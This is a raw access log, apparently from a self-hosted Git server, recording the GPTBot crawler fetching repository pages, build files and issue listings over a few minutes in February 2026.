"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10145] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:02:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9964] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 9961] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:02:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11119] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:02:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10819] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10820] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:17:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11120] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:02:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14657] [Gzip 5.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11116] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:02:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11577] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3?display=source" [Client 74.7.227.38] [Length 11545] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:17:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache?display=source" [Client 74.7.227.38] [Length 12415] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/project.nuget.cache" +[17/Feb/2026:17:02:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11017] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:02:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22045] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:02:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11086] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11076] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:02:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:02:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11090] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3" +[17/Feb/2026:17:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11016] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:02:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx?display=source" [Client 74.7.227.38] [Length 11507] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:17:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11542] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:03:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:17:03:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11019] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13010] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:03:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11552] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:03:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 9970] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:03:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11856] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old" +[17/Feb/2026:17:03:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11096] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11104] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:03:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11054] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 